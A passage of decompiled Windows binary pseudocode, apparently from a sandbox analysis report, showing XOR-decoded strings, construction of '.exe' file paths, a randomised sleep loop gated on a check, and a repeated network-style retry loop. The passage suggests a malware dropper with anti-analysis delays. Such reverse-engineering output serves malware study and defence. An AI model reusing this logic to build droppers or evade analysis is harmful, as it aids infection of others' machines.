																	_t1181 = _t1121 ^ 0x0000002e;
																	__eflags = _t1181;
																	 *0x450f3f = _t1181;
																}
																_t1481 = 0x450f38;
																_v452 = 0;
																_v436 = 0;
																_v432 = 0xf;
																_v452 = 0;
																_t296 =  &(_t1481[1]); // 0x450f39
																_t1623 = _t296;
																do {
																	_t1122 =  *_t1481;
																	_t1481 =  &(_t1481[1]);
																	__eflags = _t1122;
																} while (_t1122 != 0);
																E004026C0(_t1306,  &_v452, 0x450f38, _t1481 - _t1623);
																_v16 = 0x11;
																_t1624 = _v432;
																_t1484 = _v436;
																__eflags = _t1624 - _t1484 - 1;
																if(_t1624 - _t1484 < 1) {
																	_v400 = 0;
																	_t1126 = E00402990(_t1306,  &_v452, _t1681, _t1686, 1, _v400, "\\", 1);
																} else {
																	_t301 =  &(1[_t1484]); // 0x1
																	__eflags = _t1624 - 0x10;
																	_v436 = _t301;
																	_t1180 =  >=  ? _v452 :  &_v452;
																	 *((short*)(( >=  ? _v452 :  &_v452) + _t1484)) = 0x5c;
																	_t1126 =  &_v452;
																}
																_v428 = 0;
																_v412 = 0;
																_v408 = 0;
																asm("movups xmm0, [eax]");
																asm("movups [ebp-0x1a0], xmm0");
																asm("movq xmm0, [eax+0x10]");
																asm("movq [ebp-0x190], xmm0");
																 *(_t1126 + 0x10) = 0;
																 *(_t1126 + 0x14) = 0xf;
																 *_t1126 = 0;
																_v16 = 0x12;
																_t1128 = E0040C910( &_v476,  &_v428,  &_v372);
																_t1714 = _t1753 + 4;
																E004024A0(_t1306,  &_v396, _t1128);
																_t1626 = _v456;
																__eflags = _t1626 - 0x10;
																if(_t1626 < 0x10) {
																	L146:
																	_v16 = 0x11;
																	_t1627 = _v408;
																	_v460 = 0;
																	_v456 = 0xf;
																	_v476 = 0;
																	__eflags = _t1627 - 0x10;
																	if(_t1627 < 0x10) {
																		L150:
																		_v16 = 2;
																		_t1628 = _v432;
																		_v412 = 0;
																		_v408 = 0xf;
																		_v428 = 0;
																		__eflags = _t1628 - 0x10;
																		if(_t1628 < 0x10) {
																			L154:
																			_t1754 = _t1714 - 0x18;
																			_v304 = _t1754;
																			E0040BB10(_t1306, _t1754, _t1628, _t1681,  &_v348);
																			_t1755 = _t1754 - 0x18;
																			_v16 = 0x13;
																			_t1489 = _t1755;
																			E0040BB10(_t1306, _t1489, _t1628, _t1681,  &_v396);
																			_v16 = 2;
																			_t1134 = E00406800(_t1306, _t1489, _t1681, _t1686);
																			_t1714 = _t1755 + 0x30;
																			__eflags = _t1134;
																			if(_t1134 == 0) {
																				_v16 = 1;
																				_t1629 = _v328;
																				__eflags = _t1629 - 0x10;
																				if(_t1629 < 0x10) {
																					L180:
																					_v16 = 0;
																					_t1554 = _v352;
																					_v332 = 0;
																					_v328 = 0xf;
																					_v348 = 0;
																					__eflags = _t1554 - 0x10;
																					if(_t1554 < 0x10) {
																						L309:
																						E00402520(_t1686, 0x4399f7);
																						L310:
																						E00402450(_t1306,  &_v396);
																						goto L311;
																					} else {
																						_t1490 = _v372;
																						_t1554 =  &(1[_t1554]);
																						_t1135 = _t1490;
																						__eflags = _t1554 - 0x1000;
																						if(_t1554 < 0x1000) {
																							L183:
																							_push(_t1554);
																							E0040ED7F(_t1490);
																							goto L309;
																						} else {
																							_t1357 =  *((intOrPtr*)(_t1490 - 4));
																							_t1554 = _t1554 + 0x23;
																							__eflags = _t1135 -  *((intOrPtr*)(_t1490 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L313;
																							} else {
																								goto L183;
																							}
																						}
																					}
																				} else {
																					_t1491 = _v348;
																					_t1630 = _t1629 + 1;
																					_t1139 = _t1491;
																					__eflags = _t1630 - 0x1000;
																					if(_t1630 < 0x1000) {
																						L179:
																						_push(_t1630);
																						E0040ED7F(_t1491);
																						_t1714 = _t1714 + 8;
																						goto L180;
																					} else {
																						_t1357 =  *((intOrPtr*)(_t1491 - 4));
																						_t1554 = _t1630 + 0x23;
																						__eflags = _t1139 -  *((intOrPtr*)(_t1491 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L313;
																						} else {
																							goto L179;
																						}
																					}
																				}
																			} else {
																				_push(_t1489);
																				_t1143 = E0040C6F0( &_v428,  &_v396);
																				_v16 = 0x14;
																				_t1144 = E0040C910( &_v476, _t1143,  &_v348);
																				_t1714 = _t1714 + 8;
																				_t1495 = _t1144;
																				_v16 = 0x15;
																				_t1681 =  *(_t1495 + 0x14);
																				_t1633 =  *(_t1495 + 0x10);
																				__eflags = _t1681 - _t1633 - 4;
																				if(_t1681 - _t1633 < 4) {
																					_v400 = 0;
																					_t1495 = E00402990(_t1306, _t1495, _t1681, _t1686, 4, _v400, ".exe", 4);
																				} else {
																					 *(_t1495 + 0x10) = _t1633 + 4;
																					_t1165 = _t1495;
																					__eflags = _t1681 - 0x10;
																					if(_t1681 >= 0x10) {
																						_t1165 =  *_t1495;
																					}
																					 *((intOrPtr*)(_t1165 + _t1633)) = 0x6578652e;
																					 *((char*)(_t1165 + _t1633 + 4)) = 0;
																				}
																				 *_t1686 = 0;
																				 *(_t1686 + 0x10) = 0;
																				 *(_t1686 + 0x14) = 0;
																				asm("movups xmm0, [ecx]");
																				asm("movups [esi], xmm0");
																				asm("movq xmm0, [ecx+0x10]");
																				asm("movq [esi+0x10], xmm0");
																				 *(_t1495 + 0x10) = 0;
																				 *(_t1495 + 0x14) = 0xf;
																				 *_t1495 = 0;
																				_t1634 = _v456;
																				__eflags = _t1634 - 0x10;
																				if(_t1634 < 0x10) {
																					L164:
																					_t1635 = _v408;
																					_v460 = 0;
																					_v456 = 0xf;
																					_v476 = 0;
																					__eflags = _t1635 - 0x10;
																					if(_t1635 < 0x10) {
																						L168:
																						_t1636 = _v328;
																						_v412 = 0;
																						_v408 = 0xf;
																						_v428 = 0;
																						__eflags = _t1636 - 0x10;
																						if(_t1636 < 0x10) {
																							L172:
																							_t1637 = _v352;
																							_v332 = 0;
																							_v328 = 0xf;
																							_v348 = 0;
																							__eflags = _t1637 - 0x10;
																							if(__eflags < 0) {
																								goto L38;
																							} else {
																								_t1496 = _v372;
																								_t1638 = _t1637 + 1;
																								_t1148 = _t1496;
																								__eflags = _t1638 - 0x1000;
																								if(__eflags < 0) {
																									goto L37;
																								} else {
																									_t1357 =  *((intOrPtr*)(_t1496 - 4));
																									_t1554 = _t1638 + 0x23;
																									__eflags = _t1148 -  *((intOrPtr*)(_t1496 - 4)) + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L313;
																									} else {
																										goto L37;
																									}
																								}
																							}
																						} else {
																							_t1497 = _v348;
																							_t1639 = _t1636 + 1;
																							_t1152 = _t1497;
																							__eflags = _t1639 - 0x1000;
																							if(_t1639 < 0x1000) {
																								L171:
																								_push(_t1639);
																								E0040ED7F(_t1497);
																								_t1714 = _t1714 + 8;
																								goto L172;
																							} else {
																								_t1357 =  *((intOrPtr*)(_t1497 - 4));
																								_t1554 = _t1639 + 0x23;
																								__eflags = _t1152 -  *((intOrPtr*)(_t1497 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L313;
																								} else {
																									goto L171;
																								}
																							}
																						}
																					} else {
																						_t1498 = _v428;
																						_t1640 = _t1635 + 1;
																						_t1156 = _t1498;
																						__eflags = _t1640 - 0x1000;
																						if(_t1640 < 0x1000) {
																							L167:
																							_push(_t1640);
																							E0040ED7F(_t1498);
																							_t1714 = _t1714 + 8;
																							goto L168;
																						} else {
																							_t1357 =  *((intOrPtr*)(_t1498 - 4));
																							_t1554 = _t1640 + 0x23;
																							__eflags = _t1156 -  *((intOrPtr*)(_t1498 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L313;
																							} else {
																								goto L167;
																							}
																						}
																					}
																				} else {
																					_t1499 = _v476;
																					_t1641 = _t1634 + 1;
																					_t1160 = _t1499;
																					__eflags = _t1641 - 0x1000;
																					if(_t1641 < 0x1000) {
																						L163:
																						_push(_t1641);
																						E0040ED7F(_t1499);
																						_t1714 = _t1714 + 8;
																						goto L164;
																					} else {
																						_t1357 =  *((intOrPtr*)(_t1499 - 4));
																						_t1554 = _t1641 + 0x23;
																						__eflags = _t1160 -  *((intOrPtr*)(_t1499 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L313;
																						} else {
																							goto L163;
																						}
																					}
																				}
																			}
																		} else {
																			_t1500 = _v452;
																			_t1628 = _t1628 + 1;
																			_t1166 = _t1500;
																			__eflags = _t1628 - 0x1000;
																			if(_t1628 < 0x1000) {
																				L153:
																				_push(_t1628);
																				E0040ED7F(_t1500);
																				_t1714 = _t1714 + 8;
																				goto L154;
																			} else {
																				_t1357 =  *((intOrPtr*)(_t1500 - 4));
																				_t1554 = _t1628 + 0x23;
																				__eflags = _t1166 -  *((intOrPtr*)(_t1500 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L313;
																				} else {
																					goto L153;
																				}
																			}
																		}
																	} else {
																		_t1501 = _v428;
																		_t1642 = _t1627 + 1;
																		_t1170 = _t1501;
																		__eflags = _t1642 - 0x1000;
																		if(_t1642 < 0x1000) {
																			L149:
																			_push(_t1642);
																			E0040ED7F(_t1501);
																			_t1714 = _t1714 + 8;
																			goto L150;
																		} else {
																			_t1357 =  *((intOrPtr*)(_t1501 - 4));
																			_t1554 = _t1642 + 0x23;
																			__eflags = _t1170 -  *((intOrPtr*)(_t1501 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L149;
																			}
																		}
																	}
																} else {
																	_t1502 = _v476;
																	_t1643 = _t1626 + 1;
																	_t1174 = _t1502;
																	__eflags = _t1643 - 0x1000;
																	if(_t1643 < 0x1000) {
																		L145:
																		_push(_t1643);
																		E0040ED7F(_t1502);
																		_t1714 = _t1714 + 8;
																		goto L146;
																	} else {
																		_t1357 =  *((intOrPtr*)(_t1502 - 4));
																		_t1554 = _t1643 + 0x23;
																		__eflags = _t1174 -  *((intOrPtr*)(_t1502 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L145;
																		}
																	}
																}
															} else {
																_push(_t1480);
																_t1186 = E0040C6F0( &_v428,  &_v396);
																_v16 = 0xf;
																_t1187 = E0040C910( &_v476, _t1186,  &_v348);
																_t1714 = _t1753 + 8;
																_t1507 = _t1187;
																_v16 = 0x10;
																_t1681 =  *(_t1507 + 0x14);
																_t1646 =  *(_t1507 + 0x10);
																__eflags = _t1681 - _t1646 - 4;
																if(_t1681 - _t1646 < 4) {
																	_v400 = 0;
																	_t1507 = E00402990(_t1306, _t1507, _t1681, _t1686, 4, _v400, ".exe", 4);
																} else {
																	 *(_t1507 + 0x10) = _t1646 + 4;
																	_t1207 = _t1507;
																	__eflags = _t1681 - 0x10;
																	if(_t1681 >= 0x10) {
																		_t1207 =  *_t1507;
																	}
																	 *((intOrPtr*)(_t1207 + _t1646)) = 0x6578652e;
																	 *((char*)(_t1207 + _t1646 + 4)) = 0;
																}
																 *_t1686 = 0;
																 *(_t1686 + 0x10) = 0;
																 *(_t1686 + 0x14) = 0;
																asm("movups xmm0, [ecx]");
																asm("movups [esi], xmm0");
																asm("movq xmm0, [ecx+0x10]");
																asm("movq [esi+0x10], xmm0");
																 *(_t1507 + 0x10) = 0;
																 *(_t1507 + 0x14) = 0xf;
																 *_t1507 = 0;
																_t1647 = _v456;
																__eflags = _t1647 - 0x10;
																if(_t1647 < 0x10) {
																	L120:
																	_t1648 = _v408;
																	_v460 = 0;
																	_v456 = 0xf;
																	_v476 = 0;
																	__eflags = _t1648 - 0x10;
																	if(_t1648 < 0x10) {
																		L124:
																		_t1649 = _v328;
																		_v412 = 0;
																		_v408 = 0xf;
																		_v428 = 0;
																		__eflags = _t1649 - 0x10;
																		if(_t1649 < 0x10) {
																			L128:
																			_t1650 = _v352;
																			_v332 = 0;
																			_v328 = 0xf;
																			_v348 = 0;
																			__eflags = _t1650 - 0x10;
																			if(__eflags < 0) {
																				goto L38;
																			} else {
																				_t1496 = _v372;
																				_t1638 = _t1650 + 1;
																				_t1191 = _t1496;
																				__eflags = _t1638 - 0x1000;
																				if(__eflags < 0) {
																					goto L37;
																				} else {
																					_t1357 =  *((intOrPtr*)(_t1496 - 4));
																					_t1554 = _t1638 + 0x23;
																					__eflags = _t1191 -  *((intOrPtr*)(_t1496 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L313;
																					} else {
																						goto L37;
																					}
																				}
																			}
																		} else {
																			_t1508 = _v348;
																			_t1651 = _t1649 + 1;
																			_t1194 = _t1508;
																			__eflags = _t1651 - 0x1000;
																			if(_t1651 < 0x1000) {
																				L127:
																				_push(_t1651);
																				E0040ED7F(_t1508);
																				_t1714 = _t1714 + 8;
																				goto L128;
																			} else {
																				_t1357 =  *((intOrPtr*)(_t1508 - 4));
																				_t1554 = _t1651 + 0x23;
																				__eflags = _t1194 -  *((intOrPtr*)(_t1508 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L313;
																				} else {
																					goto L127;
																				}
																			}
																		}
																	} else {
																		_t1509 = _v428;
																		_t1652 = _t1648 + 1;
																		_t1198 = _t1509;
																		__eflags = _t1652 - 0x1000;
																		if(_t1652 < 0x1000) {
																			L123:
																			_push(_t1652);
																			E0040ED7F(_t1509);
																			_t1714 = _t1714 + 8;
																			goto L124;
																		} else {
																			_t1357 =  *((intOrPtr*)(_t1509 - 4));
																			_t1554 = _t1652 + 0x23;
																			__eflags = _t1198 -  *((intOrPtr*)(_t1509 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L123;
																			}
																		}
																	}
																} else {
																	_t1510 = _v476;
																	_t1653 = _t1647 + 1;
																	_t1202 = _t1510;
																	__eflags = _t1653 - 0x1000;
																	if(_t1653 < 0x1000) {
																		L119:
																		_push(_t1653);
																		E0040ED7F(_t1510);
																		_t1714 = _t1714 + 8;
																		goto L120;
																	} else {
																		_t1357 =  *((intOrPtr*)(_t1510 - 4));
																		_t1554 = _t1653 + 0x23;
																		__eflags = _t1202 -  *((intOrPtr*)(_t1510 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L119;
																		}
																	}
																}
															}
														} else {
															_t1511 = _v452;
															_t1622 = _t1622 + 1;
															_t1208 = _t1511;
															__eflags = _t1622 - 0x1000;
															if(_t1622 < 0x1000) {
																L109:
																_push(_t1622);
																E0040ED7F(_t1511);
																_t1714 = _t1714 + 8;
																goto L110;
															} else {
																_t1357 =  *((intOrPtr*)(_t1511 - 4));
																_t1554 = _t1622 + 0x23;
																__eflags = _t1208 -  *((intOrPtr*)(_t1511 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L109;
																}
															}
														}
													} else {
														_t1512 = _v428;
														_t1654 = _t1621 + 1;
														_t1212 = _t1512;
														__eflags = _t1654 - 0x1000;
														if(_t1654 < 0x1000) {
															L105:
															_push(_t1654);
															E0040ED7F(_t1512);
															_t1714 = _t1714 + 8;
															goto L106;
														} else {
															_t1357 =  *((intOrPtr*)(_t1512 - 4));
															_t1554 = _t1654 + 0x23;
															__eflags = _t1212 -  *((intOrPtr*)(_t1512 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L105;
															}
														}
													}
												} else {
													_t1513 = _v476;
													_t1655 = _t1620 + 1;
													_t1216 = _t1513;
													__eflags = _t1655 - 0x1000;
													if(_t1655 < 0x1000) {
														L101:
														_push(_t1655);
														E0040ED7F(_t1513);
														_t1714 = _t1714 + 8;
														goto L102;
													} else {
														_t1357 =  *((intOrPtr*)(_t1513 - 4));
														_t1554 = _t1655 + 0x23;
														__eflags = _t1216 -  *((intOrPtr*)(_t1513 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L101;
														}
													}
												}
											} else {
												_push(_t1471);
												_t1230 = E0040C6F0( &_v452,  &_v396);
												_v16 = 0xa;
												_t1231 = E0040C910( &_v428, _t1230,  &_v348);
												_t1714 = _t1750 + 8;
												_t1517 = _t1231;
												_v16 = 0xb;
												_t1681 =  *(_t1517 + 0x14);
												_t1658 =  *(_t1517 + 0x10);
												__eflags = _t1681 - _t1658 - 4;
												if(_t1681 - _t1658 < 4) {
													_v400 = 0;
													_t1517 = E00402990(_t1306, _t1517, _t1681, _t1686, 4, _v400, ".exe", 4);
												} else {
													 *(_t1517 + 0x10) = _t1658 + 4;
													_t1251 = _t1517;
													__eflags = _t1681 - 0x10;
													if(_t1681 >= 0x10) {
														_t1251 =  *_t1517;
													}
													 *((intOrPtr*)(_t1251 + _t1658)) = 0x6578652e;
													 *((char*)(_t1251 + _t1658 + 4)) = 0;
												}
												 *_t1686 = 0;
												 *(_t1686 + 0x10) = 0;
												 *(_t1686 + 0x14) = 0;
												asm("movups xmm0, [ecx]");
												asm("movups [esi], xmm0");
												asm("movq xmm0, [ecx+0x10]");
												asm("movq [esi+0x10], xmm0");
												 *(_t1517 + 0x10) = 0;
												 *(_t1517 + 0x14) = 0xf;
												 *_t1517 = 0;
												_t1659 = _v408;
												__eflags = _t1659 - 0x10;
												if(_t1659 < 0x10) {
													L75:
													_t1660 = _v432;
													_v412 = 0;
													_v408 = 0xf;
													_v428 = 0;
													__eflags = _t1660 - 0x10;
													if(_t1660 < 0x10) {
														L79:
														_t1661 = _v328;
														_v436 = 0;
														_v432 = 0xf;
														_v452 = 0;
														__eflags = _t1661 - 0x10;
														if(_t1661 < 0x10) {
															L83:
															_t1662 = _v352;
															_v332 = 0;
															_v328 = 0xf;
															_v348 = 0;
															__eflags = _t1662 - 0x10;
															if(__eflags < 0) {
																goto L38;
															} else {
																_t1496 = _v372;
																_t1638 = _t1662 + 1;
																_t1235 = _t1496;
																__eflags = _t1638 - 0x1000;
																if(__eflags < 0) {
																	goto L37;
																} else {
																	_t1357 =  *((intOrPtr*)(_t1496 - 4));
																	_t1554 = _t1638 + 0x23;
																	__eflags = _t1235 -  *((intOrPtr*)(_t1496 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L37;
																	}
																}
															}
														} else {
															_t1518 = _v348;
															_t1663 = _t1661 + 1;
															_t1238 = _t1518;
															__eflags = _t1663 - 0x1000;
															if(_t1663 < 0x1000) {
																L82:
																_push(_t1663);
																E0040ED7F(_t1518);
																_t1714 = _t1714 + 8;
																goto L83;
															} else {
																_t1357 =  *((intOrPtr*)(_t1518 - 4));
																_t1554 = _t1663 + 0x23;
																__eflags = _t1238 -  *((intOrPtr*)(_t1518 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L82;
																}
															}
														}
													} else {
														_t1519 = _v452;
														_t1664 = _t1660 + 1;
														_t1242 = _t1519;
														__eflags = _t1664 - 0x1000;
														if(_t1664 < 0x1000) {
															L78:
															_push(_t1664);
															E0040ED7F(_t1519);
															_t1714 = _t1714 + 8;
															goto L79;
														} else {
															_t1357 =  *((intOrPtr*)(_t1519 - 4));
															_t1554 = _t1664 + 0x23;
															__eflags = _t1242 -  *((intOrPtr*)(_t1519 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L78;
															}
														}
													}
												} else {
													_t1520 = _v428;
													_t1665 = _t1659 + 1;
													_t1246 = _t1520;
													__eflags = _t1665 - 0x1000;
													if(_t1665 < 0x1000) {
														L74:
														_push(_t1665);
														E0040ED7F(_t1520);
														_t1714 = _t1714 + 8;
														goto L75;
													} else {
														_t1357 =  *((intOrPtr*)(_t1520 - 4));
														_t1554 = _t1665 + 0x23;
														__eflags = _t1246 -  *((intOrPtr*)(_t1520 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L74;
														}
													}
												}
											}
										} else {
											_t1521 = _v324;
											_t1616 =  &(1[_t1616]);
											_t1252 = _t1521;
											__eflags = _t1616 - 0x1000;
											if(_t1616 < 0x1000) {
												L64:
												_push(_t1616);
												E0040ED7F(_t1521);
												_t1714 = _t1714 + 8;
												goto L65;
											} else {
												_t1357 =  *((intOrPtr*)(_t1521 - 4));
												_t1554 = _t1616 + 0x23;
												__eflags = _t1252 -  *((intOrPtr*)(_t1521 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L314;
												} else {
													goto L64;
												}
											}
										}
									} else {
										_t1522 = _v452;
										_t1666 = _t1615 + 1;
										_t1256 = _t1522;
										__eflags = _t1666 - 0x1000;
										if(_t1666 < 0x1000) {
											L60:
											_push(_t1666);
											E0040ED7F(_t1522);
											_t1714 = _t1714 + 8;
											goto L61;
										} else {
											_t1357 =  *((intOrPtr*)(_t1522 - 4));
											_t1554 = _t1666 + 0x23;
											__eflags = _t1256 -  *((intOrPtr*)(_t1522 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L314;
											} else {
												goto L60;
											}
										}
									}
								} else {
									_t1523 = _v428;
									_t1667 = _t1614 + 1;
									_t1260 = _t1523;
									__eflags = _t1667 - 0x1000;
									if(_t1667 < 0x1000) {
										L56:
										_push(_t1667);
										E0040ED7F(_t1523);
										_t1714 = _t1714 + 8;
										goto L57;
									} else {
										_t1357 =  *((intOrPtr*)(_t1523 - 4));
										_t1554 = _t1667 + 0x23;
										__eflags = _t1260 -  *((intOrPtr*)(_t1523 - 4)) + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L314;
										} else {
											goto L56;
										}
									}
								}
							} else {
								_push(_t1462);
								_t1272 = E0040C6F0( &_v452,  &_v396);
								_v16 = 5;
								_t1273 = E0040C910( &_v428, _t1272,  &_v348);
								_t1714 = _t1747 + 8;
								_t1527 = _t1273;
								_v16 = 6;
								_t1681 =  *(_t1527 + 0x14);
								_t1670 =  *(_t1527 + 0x10);
								if(_t1681 - _t1670 < 4) {
									_v400 = 0;
									_t1527 = E00402990(_t1306, _t1527, _t1681, _t1686, 4, _v400, ".exe", 4);
								} else {
									 *(_t1527 + 0x10) = _t1670 + 4;
									_t1293 = _t1527;
									if(_t1681 >= 0x10) {
										_t1293 =  *_t1527;
									}
									 *((intOrPtr*)(_t1293 + _t1670)) = 0x6578652e;
									 *((char*)(_t1293 + _t1670 + 4)) = 0;
								}
								 *_t1686 = 0;
								 *(_t1686 + 0x10) = 0;
								 *(_t1686 + 0x14) = 0;
								asm("movups xmm0, [ecx]");
								asm("movups [esi], xmm0");
								asm("movq xmm0, [ecx+0x10]");
								asm("movq [esi+0x10], xmm0");
								 *(_t1527 + 0x10) = 0;
								 *(_t1527 + 0x14) = 0xf;
								 *_t1527 = 0;
								_t1671 = _v408;
								if(_t1671 < 0x10) {
									L26:
									_t1672 = _v432;
									_v412 = 0;
									_v408 = 0xf;
									_v428 = 0;
									if(_t1672 < 0x10) {
										L30:
										_t1673 = _v328;
										_v436 = 0;
										_v432 = 0xf;
										_v452 = 0;
										if(_t1673 < 0x10) {
											L34:
											_t1674 = _v352;
											_v332 = 0;
											_v328 = 0xf;
											_v348 = 0;
											if(_t1674 < 0x10) {
												L38:
												_v356 = 0;
												_v352 = 0xf;
												_v372 = 0;
												L39:
												_t1554 = _v376;
												if(_t1554 < 0x10) {
													L311:
													 *[fs:0x0] = _v24;
													_pop(_t1682);
													_pop(_t1687);
													return E0040EB3F(_t1686, _t1306, _v32 ^ _t1696, _t1554, _t1682, _t1687);
												} else {
													_t1432 = _v396;
													_t1554 =  &(1[_t1554]);
													_t987 = _t1432;
													if(_t1554 < 0x1000) {
														L274:
														_push(_t1554);
														E0040ED7F(_t1432);
														goto L311;
													} else {
														_t1357 =  *((intOrPtr*)(_t1432 - 4));
														_t1554 = _t1554 + 0x23;
														if(_t987 -  *((intOrPtr*)(_t1432 - 4)) + 0xfffffffc > 0x1f) {
															goto L313;
														} else {
															goto L274;
														}
													}
												}
											} else {
												_t1496 = _v372;
												_t1638 = _t1674 + 1;
												_t1277 = _t1496;
												if(_t1638 < 0x1000) {
													L37:
													_push(_t1638);
													E0040ED7F(_t1496);
													_t1714 = _t1714 + 8;
													goto L38;
												} else {
													_t1357 =  *((intOrPtr*)(_t1496 - 4));
													_t1554 = _t1638 + 0x23;
													if(_t1277 -  *((intOrPtr*)(_t1496 - 4)) + 0xfffffffc > 0x1f) {
														goto L313;
													} else {
														goto L37;
													}
												}
											}
										} else {
											_t1528 = _v348;
											_t1675 = _t1673 + 1;
											_t1280 = _t1528;
											if(_t1675 < 0x1000) {
												L33:
												_push(_t1675);
												E0040ED7F(_t1528);
												_t1714 = _t1714 + 8;
												goto L34;
											} else {
												_t1357 =  *((intOrPtr*)(_t1528 - 4));
												_t1554 = _t1675 + 0x23;
												if(_t1280 -  *((intOrPtr*)(_t1528 - 4)) + 0xfffffffc > 0x1f) {
													goto L313;
												} else {
													goto L33;
												}
											}
										}
									} else {
										_t1529 = _v452;
										_t1676 = _t1672 + 1;
										_t1284 = _t1529;
										if(_t1676 < 0x1000) {
											L29:
											_push(_t1676);
											E0040ED7F(_t1529);
											_t1714 = _t1714 + 8;
											goto L30;
										} else {
											_t1357 =  *((intOrPtr*)(_t1529 - 4));
											_t1554 = _t1676 + 0x23;
											if(_t1284 -  *((intOrPtr*)(_t1529 - 4)) + 0xfffffffc > 0x1f) {
												goto L313;
											} else {
												goto L29;
											}
										}
									}
								} else {
									_t1530 = _v428;
									_t1677 = _t1671 + 1;
									_t1288 = _t1530;
									if(_t1677 < 0x1000) {
										L25:
										_push(_t1677);
										E0040ED7F(_t1530);
										_t1714 = _t1714 + 8;
										goto L26;
									} else {
										_t1357 =  *((intOrPtr*)(_t1530 - 4));
										_t1554 = _t1677 + 0x23;
										if(_t1288 -  *((intOrPtr*)(_t1530 - 4)) + 0xfffffffc > 0x1f) {
											goto L313;
										} else {
											goto L25;
										}
									}
								}
							}
						} else {
							_t1531 = _v476;
							_t1610 = _t1610 + 1;
							_t1294 = _t1531;
							if(_t1610 < 0x1000) {
								L15:
								_push(_t1610);
								E0040ED7F(_t1531);
								_t1714 = _t1714 + 8;
								goto L16;
							} else {
								_t1357 =  *((intOrPtr*)(_t1531 - 4));
								_t1554 = _t1610 + 0x23;
								if(_t1294 -  *((intOrPtr*)(_t1531 - 4)) + 0xfffffffc > 0x1f) {
									goto L312;
								} else {
									goto L15;
								}
							}
						}
					} else {
						_t1532 = _v428;
						_t1678 = _t1609 + 1;
						_t1299 = _t1532;
						if(_t1678 < 0x1000) {
							L11:
							_push(_t1678);
							E0040ED7F(_t1532);
							_t1714 = _t1714 + 8;
							goto L12;
						} else {
							_t1357 =  *((intOrPtr*)(_t1532 - 4));
							_t1554 = _t1678 + 0x23;
							if(_t1299 -  *((intOrPtr*)(_t1532 - 4)) + 0xfffffffc > 0x1f) {
								L312:
								E004134A7(_t1306, _t1554, __eflags);
								L313:
								E004134A7(_t1306, _t1554, __eflags);
								L314:
								E004134A7(_t1306, _t1554, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t1696);
								_t1698 = _t1714;
								_push(0xffffffff);
								_push(0x42c9a7);
								_push( *[fs:0x0]);
								_t1722 = _t1714 - 0x4dc;
								_t868 =  *0x43d054; // 0x8e1b5714
								_t869 = _t868 ^ _t1698;
								_v508 = _t869;
								_push(_t1306);
								_push(_t1686);
								_push(_t1681);
								_push(_t869);
								 *[fs:0x0] =  &_v504;
								_v496 = 0;
								_t871 = E00405F40(_t1306, _t1681); // executed
								_t1308 = Sleep;
								__eflags = _t871;
								if(__eflags != 0) {
									_t1686 = 0x7d0;
									do {
										_t957 = E00417D76(_t1357, __eflags);
										asm("cdq");
										_t1554 = _t957 % 0x7d0 + 0x3e8;
										Sleep(_t957 % 0x7d0 + 0x3e8);
										__eflags = E00405F40(Sleep, _t1681);
									} while (__eflags != 0);
								}
								E00401970(_t1308,  &_v760);
								_v20 = 1;
								_t875 = E00402520( &_v1152, E0040B840(E00409300(_t1554, _t1681, _t1686)));
								_v20 = 2;
								_t878 = E00402520( &_v1128, E0040B870(E00409270(_t1308, _t1554, _t875, _t1686)));
								_v20 = 3;
								L352();
								_t880 = E00402520( &_v1272, E0040B720(_t878));
								_v20 = 4;
								_t881 = E0040C8B0( &_v1248, 0x450de0, _t880);
								_v20 = 5;
								_t882 = E0040C910( &_v1224, _t881,  &_v8);
								_v20 = 6;
								_t883 = E0040C9C0( &_v1200, _t882, _t878);
								_v20 = 7;
								_t884 = E0040C9C0( &_v1176, _t883, _t875);
								_v20 = 8;
								E0040C910( &_v104, _t884, 0x450dc8);
								_t1728 = _t1722 - 0x14 + 0x14;
								E00402450(_t1308,  &_v1176);
								E00402450(_t1308,  &_v1200);
								E00402450(_t1308,  &_v1224);
								E00402450(_t1308,  &_v1248);
								E00402450(_t1308,  &_v1272);
								E00402450(_t1308,  &_v1128);
								_v20 = 0x10;
								E00402450(_t1308,  &_v1152);
								_t1689 = 0;
								__eflags = 0;
								_t1684 = 0xc8;
								while(1) {
									_t1689 =  &(1[_t1689]);
									_t893 = E00402410( &_v104);
									_t1379 =  &_v760;
									_t894 = E00402310(_t1308,  &_v760, _t1684, _t893); // executed
									__eflags = _t894;
									if(_t894 == 0) {
										goto L323;
									}
									E00402520( &_v56, E00402380( &_v760));
									_t1566 = "0";
									_t903 = E00402810( &_v56, "0");
									__eflags = _t903;
									if(_t903 == 0) {
